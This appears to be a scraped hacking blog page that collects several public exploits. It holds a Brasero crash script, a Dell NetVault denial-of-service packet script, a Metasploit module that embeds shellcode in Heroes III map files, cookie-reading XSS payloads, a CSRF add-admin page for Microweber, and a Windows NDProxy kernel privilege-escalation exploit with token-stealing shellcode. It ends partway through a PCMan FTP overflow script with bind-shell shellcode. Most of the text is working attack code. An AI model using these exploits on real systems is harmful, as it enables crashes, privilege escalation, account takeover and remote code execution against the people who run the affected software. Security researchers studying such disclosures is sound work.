#!/usr/bin/perl -w
# Title : Kali (brasero) - Crash Proof Of Concept
# website : https://www.kali.org/downloads/
# Tested : kali 1.x
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
#Demo : http://youtu.be/XMu5ZXupbOI
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
$path="/tmp/r3z4.m3u";
my $PoC = "\x41" x 10000 ;
open(crash , ">", $path);
print crash $PoC;
close(crash);
use threads;
sub check_app { #thread sub
system("brasero $path");
return 0;
}
my @threads;
for (my $i = 0; $i < 20; $i++) {
my $thread = threads->create(\&check_app);
push(@threads, $thread);
}
foreach (@threads) { #join
$_->join();
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863144293
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
"""
Product: Dell Netvault Backup
Link: http://software.dell.com/products/netvault-backup/
Vendor: Dell
Vulnerable Version(s): 10.0.1.24 and probably prior
Tested Version: Version 10.0.1.24
Advisory Publication: July 30, 2015
Vendor Notification: January 9, 2015
Public Disclosure: July 30, 2015
Vulnerability Type: Remote Denial of service
CVE Reference: CVE-2015-5696
Risk Level: Medium
Discovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24
-----------------------------------------------------------------------------------------------
Advisory Details:
Doing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.
Proof of concept script:
"""
#!/usr/bin/python
import socket as so
from struct import *
server = "192.168.140.130"
port = 20031
d = "\x18\x00\x00\x00"
d += "\x01"
#d += "\xCB\x22\x77\xC9" # Another crash example
d += "\x18\xE8\xBE\xC8" # Will cause the crash
d += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6
d += "\x00" # null byte
##
# send it
s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send(d)
s.close()
"""
-----------------------------------------------------------------------------------------------
Solution:
Disclosure timeline:
2015-01-09 Vendor notified via email
2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
2015-07-30 Public disclosure.
The fix done by Dell was not checked by the researcher.
-----------------------------------------------------------------------------------------------
"""
# Exploit Title: OSX Keychain - EXC_BAD_ACCESS
# Date: 22/07/2015
# Exploit Author: Juan Sacco
# Vendor Homepage: https://www.apple.com
# Software Link: https://www.apple.com/en/downloads/
# Version: 9.0 (55161)
# Tested on: OSX Yosemite 10.10.4
# CVE : None
# History - Reported to product-security@apple.com 20 Jul 2015
# Be careful: Crashing the Keychain will affect the user ability to use
Keychain stored passwords.
# How to reproduce it manually
1. Select a certificate, right click "New certificate preference.."
2. Under "Location or Email address:" add random values +9000
3. Click on Add to conduct the PoC manually
# Technically:
Performing @selector(addCertificatePreference:) from sender NSButton
0x608000148cf0
# Exception type
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_PROTECTION_FAILURE at 0x00007fff4d866828
External Modification Warnings:
VM Regions Near 0x7fff4d866828:
MALLOC_SMALL 00007f9e7d000000-00007f9e80000000 [ 48.0M]
rw-/rwx SM=PRV
--> STACK GUARD 00007fff4c7de000-00007fff4ffde000 [ 56.0M]
---/rwx SM=NUL stack guard for thread 0
Stack 00007fff4ffde000-00007fff507de000 [ 8192K]
rw-/rwx SM=COW thread 0
(lldb)
Process 490 resuming
Process 490 stopped
* thread #1: tid = 0x19b7, 0x00007fff92c663c3
Security`SecCertificateSetPreference + 325, queue =
'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2,
address=0x7fff4d866828)
frame #0: 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325
Security`SecCertificateSetPreference:
-> 0x7fff92c663c3 <+325>: callq 0x7fff92cf18b2 ; symbol stub
for: CFStringGetCString
0x7fff92c663c8 <+330>: movq %rbx, -0x670(%rbp)
0x7fff92c663cf <+337>: testb %al, %al
0x7fff92c663d1 <+339>: jne 0x7fff92c663d8 ; <+346>
Process: Keychain Access [598]
Path: /Applications/Utilities/Keychain
Access.app/Contents/MacOS/Keychain Access
Identifier: com.apple.keychainaccess
Version: 9.0 (55161)
Build Info: KeychainAccess-55161000000000000~620
Code Type: X86-64 (Native)
Parent Process: ??? [1]
Responsible: Keychain Access [598]
User ID: 501
Date/Time: 2015-07-28 13:32:05.183 +0200
OS Version: Mac OS X 10.10.4 (14E46)
Report Version: 11
Anonymous UUID: 08523B58-1EF8-DC4A-A7D7-CB31074E4395
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
VM Regions Near 0x7fff507776c8:
MALLOC_SMALL 00007ff93c800000-00007ff93e000000 [ 24.0M]
rw-/rwx SM=PRV
--> STACK GUARD 00007fff4e5d7000-00007fff51dd7000 [ 56.0M]
---/rwx SM=NUL stack guard for thread 0
Stack 00007fff51dd7000-00007fff525d7000 [ 8192K]
rw-/rwx SM=COW thread 0
rax: 0x0000000001e5e1a0 rbx: 0x0000000000000006 rcx: 0x0000000008000100
rdx: 0x0000000001e5e1a0
rdi: 0x000060000045b6c0 rsi: 0x00007fff507776d0 rbp: 0x00007fff525d5f30
rsp: 0x00007fff507776d0
r8: 0x0000000000000000 r9: 0x00007fff79e6a300 r10: 0x00007ff93c019790
r11: 0x00007fff79147658
r12: 0x000000000000002d r13: 0x00007fff507776d0 r14: 0x00007fff525d5880
r15: 0x00007ff93ae41680
rip: 0x00007fff901083c3 rfl: 0x0000000000010202 cr2: 0x00007fff507776c8
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
'Description' => %q{
This module embeds an exploit into an ucompressed map file (.h3m) for
Heroes of Might and Magic III. Once the map is started in-game, a
buffer overflow occuring when loading object sprite names leads to
shellcode execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pierre Lindblad', # Vulnerability discovery
'John AAkerblom' # Vulnerability discovery, PoC and Metasploit module
],
'References' =>
[
[ 'EDB', '37716' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Targets' =>
[
[
'H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
{
# Two "Anticrash"-gadgets are needed or the game will crash before ret
#
# Anticrash1, needs to pass the following code down to final JMP:
# MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
# XOR EBX, EBX
# CMP EAX, EBX
# JE SHORT <crash spot> ; JMP to crash if EAX is 0
# MOV CL, BYTE PTR DS : [EAX - 1]
# CMP CL, BL
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
# CMP CL, 0FF
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
# CMP EDI, EBX
# JNE <good spot> ; JMP to good spot. Always occurs if we get this far
#
# Summary: An address which when incremented by 4 and then dereferenced
# leads to for example a string which is preceeded neither by a 0x00 or 0xFF
'Anticrash1' => 0x004497D4,
# Anticrash2, needs to return out of the following call (tricky):
#
# MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
# CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
#
# Summary: An address which when dereferenced leads to an address that
# when incremented by 4 and then deferenced leads to a function returning
# without accessing any registers/memory that would cause a crash.
'Anticrash2' => 0x006A6430,
'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
{
'Anticrash1' => 0x00456A48,
'Anticrash2' => 0x006A6830,
'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
{
# The two anticrash gadgets are accessed in reverse order for this target,
# meaning that the documentation above for Anticrash1 applies to Anticrash2
# here. However, Anticrash1 here is accessed differently than the other targets.
# Anticrash1, needs to pass the following code:
# CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
# JNE 00591F37
# MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
# Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
'Anticrash2' => 0x005CE200,
'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
'CRC32' => 0xFEEFB9EB
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 29 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME',
[
false,
'If file exists, exploit will be embedded' \
' into it. If not, a new default h3m file where' \
' it will be embedded will be created.',
'sploit.h3m'
])
], self.class)
end
def exploit
buf = ''
# Load h3m into buffer from uncompressed .h3m on disk/default data
begin
buf << read_file(datastore['FILENAME'])
print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
rescue Errno::ENOENT
print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
'default .h3m data')
buf << make_default_h3m
end
# Find the object attributes array in the file by searching for a sprite name that occurs
# as the first game object in all maps.
objects_pos = buf.index('AVWmrnd0.def')
if objects_pos.nil?
print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
'. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')
return
end
# Entries in the objects array start with a string size followed by game sprite name string
# Move back 4 bytes from the first sprite name to get to the start of the objects array
objects_pos -= 4
print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)
# Construct a malicious object entry with a big size, where the sprite name starts
# with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
# but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
# After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
# overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
# it returns to the CALL ESP-gadget are required for the game not to crash before returning.
size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
exp = ''
exp << [size].pack('V')
exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
exp << rand_text(target['Padding'])
exp << [target.ret].pack('V')
exp << [target['Anticrash1']].pack('V')
exp << [target['Anticrash2']].pack('V')
exp << payload.encoded
# Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
from = objects_pos
to = from + size
buf[from..to] = exp
print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)
# Demo version has a crc32 check to disallow other maps than the one it comes with.
if target['CRC32']
buf = forge_crc32(buf, target['CRC32'])
if Zlib.crc32(buf) == target['CRC32']
print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
else
print_error('Failed to forge CRC32')
return
end
end
# Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
file_create(buf)
end
def substring_pos(string, substring)
string.enum_for(:scan, substring).map { $~.offset(0)[0] }
end
#
# Loads a file
#
def read_file(fname)
buf = ''
::File.open(fname, 'rb') do |f|
buf << f.read
end
buf
end
#
# Returns data for a minimimum required S size h3m map containing 2 players
#
def make_default_h3m
buf = ''
# Set map specifications to 36x36 (0x24000000) map with 2 players, with
# default/no settings for name, description, victory condition etc
buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
buf << "\x00\x00\xff\xff\xff\x00"
buf << "\xFF" * 16
buf << "\x00" * 35
# Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
buf << "\x00" * (36 * 36 * 7)
# Set object attribute array count to 1
buf << "\x01\x00\x00\x00"
# Size of first sprite name, this will be overwritten
buf << "\x12\x34\x56\x78"
# Standard name for first object, which will be searched for
buf << 'AVWmrnd0.def'
buf
end
#
# Forge crc32 by adding 4 bytes at the end of data
# http://blog.stalkr.net/2011/03/crc-32-forging.html
#
def forge_crc32(data, wanted_crc)
crc32_reverse = [
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
]
# forward calculation of CRC up to pos, sets current forward CRC state
fwd_crc = 0xffffffff
data.each_byte do |c|
fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]
end
# backward calculation of CRC up to pos, sets wanted backward CRC state
bkd_crc = wanted_crc ^ 0xffffffff
# deduce the 4 bytes we need to insert
[fwd_crc].pack('<L').each_byte.reverse_each do |c|
bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c
end
res = data + [bkd_crc].pack('<L')
res
end
end
Job Manager Persistent XSS
Details
========================================================================================
Product: Job Manager Plugin For Wordpress
Vendor-URL: www.wp-jobmanager.com
CVE-ID: CVE-2015-2321
Credits
========================================================================================
Discovered by: Owais Mehtab
Affected Products:
========================================================================================
Job Manager Plugin <= 0.7.22
Description
========================================================================================
"Job Manager Plugin For Wordpress"
More Details
========================================================================================
A persistent Cross site scripting (XSS) in Job Manager Plugin has been discovered,
the plugin's email field was not sanitized thus the vulnerability can be easily
exploited and can be used to steal cookies,perform phishing attacks and other various
attacks compromising the security of a user.
Proof of Concept
========================================================================================
Click on the "send through your résume" and set the below vector in email field
'"><img src=x onerror=prompt(document.cookie);>
Now click on initiate chat
PoC Video
https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4
<!DOCTYPE html>
<!--
Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop
PHP/Laravel CMS licensed under Apache License, Version
2.0 which allows you to create your own website, blog
or online shop.
Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Stored
cross-site scripting vulnerabilitity is also discovered.
The issue is triggered when input passed via the POST
parameter 'option_value' is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session
in context of an affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5249
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
12.07.2015
-->
<html>
<title>Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit</title>
<br /><br />
<body><center>
<form action="http://localhost/microweber-latest/api/save_user" method="POST">
<input type="hidden" name="id" value="0" />
<input type="hidden" name="thumbnail" value="" />
<input type="hidden" name="username" value="Freakazoid" />
<input type="hidden" name="password" value="00110001" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="first_name" value="Joe" />
<input type="hidden" name="last_name" value="Black" />
<input type="hidden" name="is_active" value="1" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="basic_mode" value="0" />
<input type="hidden" name="api_key" value="" />
<input type="submit" value="CSRF Adminize" />
</form>
</body>
</html>
<br /><br />
<html>
<body>
<form action="http://localhost/microweber-latest/api/save_option" method="POST">
<input type="hidden" name="option_key" value="website_keywords" />
<input type="hidden" name="option_group" value="website" />
<input type="hidden" name="option_value" value='"><img src=j onerror=confirm("ZSL")>' />
<input type="submit" value="Store XSS" />
</form></center>
</body>
</html>
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call managers
# to the Telephony Application Programming Interfaces (TAPI)
# services.
# The vulnerability is caused when the NDProxy.sys kernel
# component fails to properly validate input.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2914368 not installed)
# - service "Routing and Remote Access" running on the target
# - "Power User" user group can start and stop services
# - > sc query remoteaccess
# - > sc start remoteaccess
################################################################
# Thanks to:
# Andy (C PoC - Win XP SP3)
# ryujin (Python PoC - Win XP SP3)
################################################################
# References:
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
# https://www.exploit-db.com/exploits/30014/
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
typedef struct {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
static VOID InitFirstPage (void)
{
PVOID BaseAddress;
ULONG RegionSize;
NTSTATUS ReturnCode;
FARPROC NtAllocateVirtualMemory;
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
RegionSize = 0xf000;
BaseAddress = (PVOID) 0x00000001;
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (ReturnCode != 0)
{
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
fprintf (stderr, " Error code: %#X\n", ReturnCode);
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
FillMemory (BaseAddress, RegionSize, 0x41);
return;
}
int exploit (unsigned char *shellcode)
{
DWORD writtenBytes;
int returnValue;
InitFirstPage ();
unsigned char *shellcodeBuffer;
shellcodeBuffer = (char *) malloc (400);
memset (shellcodeBuffer, (int) "xCC", 400);
memcpy (shellcodeBuffer, shellcode, 112);
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
if (returnValue == 0)
{
printf ("[-] Attempt to map memory_write failed\n");
printf (" Error code: %d\n", GetLastError ());
exit(1);
}
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Creating a device handle on NDProxy failed\n");
printf (" Error code: %d\n", GetLastError());
exit (0);
}
DWORD inputBuffer [0x15] = {0};
DWORD returnedBytes = 0;
*(inputBuffer + 5) = 0x7030125;
*(inputBuffer + 7) = 0x34;
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
CloseHandle (ndProxyDeviceHandle);
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
return 0;
}
int main (int argc, char **argv)
{
if (argc != 2)
{
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
printf (" supported OS_TYPE:\n");
printf (" XP - Windows XP SP3 x86\n");
printf (" 2k3 - Windows 2003 SP2 x86\n");
printf ("[*] Note: the service \"Routing and Remote Access\"\n");
printf (" must be running on the target machine\n");
exit (0);
}
else
{
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
{
unsigned char shellcodeXP[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
exploit (shellcodeXP);
}
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
{
unsigned char shellcode2k3[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
exploit (shellcode2k3);
}
else
{
printf ("[-] Invalid argument\n");
printf (" Argument used: %s\n", argv[1]);
exit(0);
}
}
}
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Buffer Overflow - PUT Command
# author: @shipcod3 (Jay Turla)
# nc <host> 9988
# Tested on Windows XP Service Pack 3 - English
# description: Buffer overflow is triggered upon sending long string using the command PUT to PCMAN FTP 2.07
import socket
import sys
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
